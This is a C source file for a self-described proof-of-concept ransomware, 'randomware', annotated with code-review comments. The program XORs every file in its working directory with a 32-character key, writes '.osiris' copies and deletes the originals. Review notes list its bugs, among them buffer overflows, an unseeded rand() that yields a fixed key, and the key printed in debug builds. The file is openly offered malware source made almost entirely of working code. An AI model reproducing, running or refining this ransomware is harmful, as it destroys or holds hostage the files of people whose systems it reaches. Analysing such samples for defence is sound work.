randomware.c
/*
* PoC Ransomware
* Copyright (C) 2019 Abdullah Joseph (afjoseph)
*/
/**********************************************************************************************************************/
#include <dirent.h>
#include <elf.h>
#include <errno.h>
#include <fcntl.h>
#include <libgen.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
/* This is the new extension of a "ransomed" file */
#define RANSOMED_EXT ".osiris"
#define CHARSET "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
#define KEY_LEN 32
#define DBG
/* Count of crypted files */
/*static int Enc_Files = 0;*/
/* never displayed msg */
const char *never_displayed = "Randomware by [afjoseph]";
/*
 * Fill dest with `size` characters drawn from CHARSET using rand(), then
 * NUL-terminate the result.
 *
 * dest must have room for size + 1 bytes: the terminator is stored at
 * dest[size]. This function does not seed rand(), so the output is fully
 * determined by the generator state at the time of the call.
 */
void rand_str(char *dest, size_t size) {
    /* sizeof counts the literal's trailing NUL, hence the - 1. */
    const int charset_len = (int)(sizeof CHARSET - 1);
    char *cursor = dest;
    char *const end = dest + size;

    while (cursor < end) {
        *cursor++ = CHARSET[rand() % charset_len];
    }
    *end = '\0';
}
/*
 * XOR a single input byte with the key byte selected by its position.
 *
 * ret_char     receives the result
 * char_to_xor  input byte
 * counter      position of the byte; the key byte used is key[counter % len_key]
 * key, len_key key buffer and its length (len_key must be non-zero)
 *
 * The key repeats every len_key bytes and XOR is its own inverse, so applying
 * this function again with the same key and counter restores the input byte.
 */
void encrypt_block(uint8_t *ret_char, uint8_t char_to_xor, int counter,
                   const uint8_t *key, size_t len_key) {
    /* counter is converted to size_t for the modulo (usual arithmetic
     * conversions), exactly as in a direct key[counter % len_key]. */
    const size_t key_index = counter % len_key;
    const uint8_t key_char = key[key_index];

    *ret_char = char_to_xor ^ key_char;
#ifdef DBG
    /* Debug builds print the key byte for every processed byte. */
    printf("counter = %d\n", counter);
    printf("key_char = 0x%02x\n", key_char);
    printf("byte_to_xor = 0x%02x\n", char_to_xor);
    printf("ret_char = 0x%02x\n", *ret_char);
#endif
}
/*
 * Decide whether a directory entry is skipped.
 *
 * Returns 1 when the entry must be skipped and 0 when it is to be processed.
 * Despite the name, a non-zero result means "not proper".
 *
 * Skipped entries: "." and "..", plus any name that contains "randomware" or
 * ".osiris" anywhere in it. Both are substring matches, not suffix or
 * exact-name checks.
 */
int is_filename_proper(const char *filename) {
    const int is_dot_entry =
        strcmp(filename, ".") == 0 || strcmp(filename, "..") == 0;
    /* The program's own binary and files that already carry the output
     * suffix are left alone. */
    const int names_self = strstr(filename, "randomware") != NULL;
    const int already_done = strstr(filename, ".osiris") != NULL;

    return (is_dot_entry || names_self || already_done) ? 1 : 0;
}
/*
 * Write an XOR-transformed copy of orig_filepath to a new file whose path is
 * orig_filepath with RANSOMED_EXT (".osiris") appended, then remove the
 * original.
 *
 * orig_filepath  path of the input file; its basename is checked with
 *                is_filename_proper() and the file is skipped on a non-zero
 *                result
 * key, len_key   key bytes handed to encrypt_block() for every byte
 *
 * Observable effects, as far as this function shows: one new "*.osiris" file
 * of the same size and mode as the input, and removal of the input. The
 * transform is a repeating-key XOR (see encrypt_block), so the output can be
 * turned back into the input with the same key.
 *
 * NOTE(review): none of the early returns below release what was acquired
 * before them (descriptors, the strdup() buffer, the mapping); the mapping
 * and new_filepath are not released on the success path either.
 */
void encrypt_file(const char *orig_filepath, const uint8_t *key,
size_t len_key) {
char *bname;
char *new_filepath;
int origfile_fd, newfile_fd;
struct stat st;
int i;
uint8_t *mem, *newmem;
// NOTE(review): the cast drops const; the POSIX basename() from <libgen.h>
// is allowed to modify its argument.
bname = basename((char *)orig_filepath);
if (is_filename_proper(bname) != 0) {
return;
}
if ((origfile_fd = open(orig_filepath, O_RDONLY)) < 0) {
fprintf(stderr, "[!] open failed %s\n", orig_filepath);
return;
}
if (fstat(origfile_fd, &st) < 0) {
fprintf(stderr, "[!] fstat failed %s\n", orig_filepath);
return;
}
// Build the output path: original path + RANSOMED_EXT.
// NOTE(review): strdup() allocates exactly strlen(orig_filepath) + 1 bytes,
// so the strcat() below writes past the end of that allocation; the strdup()
// result is also not checked for NULL.
new_filepath = strdup(orig_filepath);
strcat(new_filepath, RANSOMED_EXT);
#ifdef DBG
printf("new filepath: %s\n", new_filepath);
#endif
// NOTE(review): O_CREAT is used without the mode argument, so the creation
// mode is indeterminate until the fchmod() below sets it.
if ((newfile_fd = open(new_filepath, O_WRONLY | O_CREAT | O_TRUNC)) < 0) {
fprintf(stderr, "[!] open failed %s\n", new_filepath);
return;
}
// Give the output file the permission bits of the input.
fchmod(newfile_fd, st.st_mode); // Don't handle error
// Map the whole input read-only.
// NOTE(review): the output file already exists at this point, so a failing
// mmap() (presumably including a zero-length input, TODO confirm) leaves an
// empty "*.osiris" file behind while the original stays in place.
mem = (uint8_t *)mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, origfile_fd,
0);
if (mem == MAP_FAILED) {
// NOTE(review): the message ends in "\b" (backspace); "\n" was presumably
// intended.
fprintf(stderr, "[!] mmap failed\b");
return;
}
// The output buffer for the whole file lives on the stack.
// NOTE(review): alloca() cannot report failure, so this is only workable
// for inputs well below the stack limit.
newmem = (uint8_t *)alloca(st.st_size);
#ifdef DBG
printf("\torig_filepath: %s\n", orig_filepath);
printf("\tsize of file %ld\n", st.st_size);
printf("\tfirst 4 bytes:\n");
// NOTE(review): reads mem[0..3] regardless of st.st_size.
for (i = 0; i < 4; i++) {
printf("\t%d: %02x\n", i, mem[i]);
}
printf("\tLast byte:\n");
// NOTE(review): indexes st.st_size - 2, which is the second-to-last byte
// and lies before the mapping when the file is one byte long.
printf("\t%ld: %02x\n", st.st_size, mem[st.st_size - 2]);
printf("\n");
#endif
// XOR every input byte with the key byte for its offset.
// NOTE(review): i is an int compared against st.st_size (off_t).
for (i = 0; i < st.st_size; i++) {
encrypt_block(&newmem[i], mem[i], i, key, len_key);
#ifdef DBG
// NOTE(review): integer division; i / st.st_size is 0 for every i in this
// loop, so the printed progress stays at 0.
printf("\rprogress: %ld\r", (i / st.st_size) * 100);
#endif
}
// Single write() call; a short write (> 0 but < st.st_size) is treated as
// success and the original is still removed below.
if ((write(newfile_fd, newmem, st.st_size)) <= 0) {
fprintf(stderr, "[!] write failed %s", new_filepath);
return;
}
// The original is deleted with remove() only; its contents are not
// overwritten by this function.
remove(orig_filepath); // Don't handle any errors
close(newfile_fd);
close(origfile_fd);
}
/*
 * Entry point: generate one KEY_LEN-character key with rand_str() and pass
 * every entry of the current working directory to encrypt_file() with it.
 *
 * Scope visible here: only the entries returned by readdir() on "." are
 * handled; there is no recursion into subdirectories and argc/argv are unused.
 * The key exists only in this process's stack memory (and on stdout in DBG
 * builds); nothing in this file stores or transmits it.
 *
 * NOTE(review): no srand() call is visible in this file, so rand() presumably
 * starts from its default seed and rand_str() yields the same key on every
 * run; confirm against a build. If so, files processed by this sample are
 * recoverable by re-applying the XOR with that key.
 */
int main(int argc, char **argv) {
DIR *d;
struct dirent *dir;
char *key;
// NOTE(review): the buffer holds KEY_LEN bytes, but rand_str(key, KEY_LEN)
// also stores a terminator at key[KEY_LEN], one byte past the end.
key = (char *) alloca(KEY_LEN * sizeof(char));
rand_str(key, KEY_LEN);
#ifdef DBG
// Debug builds print the key in clear text.
printf("key is: %s\n", key);
#endif
d = opendir(".");
if (d) {
// d_name is passed as a path relative to the working directory; no
// file-type check is made here, so directory entries are passed on as well.
while ((dir = readdir(d)) != NULL) {
encrypt_file(dir->d_name, (const uint8_t *)key, KEY_LEN);
}
closedir(d);
}
}